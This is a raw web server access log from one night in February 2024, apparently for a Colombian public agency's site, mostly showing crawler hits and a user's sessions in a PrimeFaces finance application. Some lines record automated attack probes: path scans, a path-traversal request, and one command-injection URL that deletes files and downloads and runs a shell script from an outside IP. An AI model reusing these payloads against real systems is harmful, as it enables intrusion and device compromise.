66.249.66.19 - - [28/Feb/2024:01:55:28 -0500] "GET /BLA/resoluciones/Autos%202008/2154.pdf HTTP/1.1" 200 288606
211.21.37.120 - - [28/Feb/2024:01:55:38 -0500] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 1034
191.108.55.117 - - [28/Feb/2024:01:55:52 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [28/Feb/2024:01:55:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.20 - - [28/Feb/2024:01:55:56 -0500] "GET /resoluciones/AUTOS%202007/3760.pdf HTTP/1.1" 404 1018
211.21.37.120 - - [28/Feb/2024:01:56:04 -0500] "GET /magmi/web/info.php HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:01:56:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [28/Feb/2024:01:56:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4308.pdf HTTP/1.1" 200 165747
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:40 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 198328
211.21.37.120 - - [28/Feb/2024:01:56:45 -0500] "POST /os/mxperson HTTP/1.1" 404 1034
190.158.201.175 - - [28/Feb/2024:01:56:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/Feb/2024:01:56:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
190.158.201.175 - - [28/Feb/2024:01:56:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40446
190.158.201.175 - - [28/Feb/2024:01:56:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:49 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:56:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
216.245.221.92 - - [28/Feb/2024:01:56:59 -0500] "HEAD / HTTP/1.1" 200 -
190.158.201.175 - - [28/Feb/2024:01:57:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 143457
190.158.201.175 - - [28/Feb/2024:01:57:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
211.21.37.120 - - [28/Feb/2024:01:57:06 -0500] "\x16\x03\x01" 400 226
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 43645
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [28/Feb/2024:01:57:27 -0500] "GET /BLA/boletinlegal/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 1038
190.158.201.175 - - [28/Feb/2024:01:57:49 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 200 39939
190.158.201.175 - - [28/Feb/2024:01:57:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:57:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
216.244.66.195 - - [28/Feb/2024:01:57:54 -0500] "GET /robots.txt HTTP/1.1" 404 1018
190.158.201.175 - - [28/Feb/2024:01:57:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5210
201.245.192.253 - - [28/Feb/2024:01:57:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:01:57:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 151620
190.158.201.175 - - [28/Feb/2024:01:58:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Feb/2024:01:58:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 39248
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:13 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:24 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 200 39971
190.158.201.175 - - [28/Feb/2024:01:58:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:01:58:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5151
66.249.66.21 - - [28/Feb/2024:01:58:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5099.pdf HTTP/1.1" 200 488257
190.158.201.175 - - [28/Feb/2024:01:58:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 151933
190.158.201.175 - - [28/Feb/2024:01:58:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:38 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 37389
66.249.79.132 - - [28/Feb/2024:01:58:55 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.79.133 - - [28/Feb/2024:01:58:55 -0500] "GET /con-actividades-pedagogicas-y-recreativas-bogota-disfruto-y-conmemoro-la-semana-ambiental.html HTTP/1.1" 200 821
190.158.201.175 - - [28/Feb/2024:01:58:57 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 200 39912
190.158.201.175 - - [28/Feb/2024:01:58:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:58:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:01:59:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5088
190.158.201.175 - - [28/Feb/2024:01:59:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 149425
190.158.201.175 - - [28/Feb/2024:01:59:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [28/Feb/2024:01:59:09 -0500] "POST /BLA/boletinlegal/auth/check HTTP/1.1" 404 1038
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 38319
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:59:12 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
66.249.66.21 - - [28/Feb/2024:01:59:15 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202022/7117.pdf HTTP/1.1" 200 387005
172.22.2.4 - - [28/Feb/2024:01:57:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:59:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:00:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:00:16 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [28/Feb/2024:01:58:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
207.46.13.125 - - [28/Feb/2024:02:00:47 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12730
114.33.213.201 - - [28/Feb/2024:02:00:56 -0500] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:02:01:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:02:01:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:02:01:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:02:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
185.224.128.200 - - [28/Feb/2024:02:03:31 -0500] "GET / HTTP/1.1" 200 319
114.33.213.201 - - [28/Feb/2024:02:03:53 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:02:03:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:04:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:03:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:05:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:06:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:04:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
66.249.66.19 - - [28/Feb/2024:02:06:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201801%20AL%201900/RESOLUCION%201848%20DE%202007.pdf HTTP/1.1" 200 182223
201.245.192.253 - - [28/Feb/2024:02:06:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
66.249.66.19 - - [28/Feb/2024:02:06:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0648.pdf HTTP/1.1" 200 553008
216.245.221.92 - - [28/Feb/2024:02:06:59 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.19 - - [28/Feb/2024:02:07:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1156.pdf HTTP/1.1" 200 461558
66.249.66.19 - - [28/Feb/2024:02:07:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2869.pdf HTTP/1.1" 200 530664
64.62.197.144 - - [28/Feb/2024:02:07:18 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:02:07:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:08:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.120.219.139 - - [28/Feb/2024:02:08:54 -0500] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 1022
40.77.167.143 - - [28/Feb/2024:02:09:24 -0500] "GET /BLA/resoluciones/AUTOS%202023/5582.pdf HTTP/1.1" 200 434284
66.249.66.21 - - [28/Feb/2024:02:09:29 -0500] "GET /resoluciones/RESOLUCIONES%202007/RES%202007%202301%20AL%202400/RESOLUCION%202370%20DE%202007.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [28/Feb/2024:02:09:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:10:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:08 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 200 195171
172.22.2.4 - - [28/Feb/2024:02:09:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.158.201.175 - - [28/Feb/2024:02:11:22 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 39849
190.158.201.175 - - [28/Feb/2024:02:11:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:11:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:02:11:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5210
190.158.201.175 - - [28/Feb/2024:02:11:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 151620
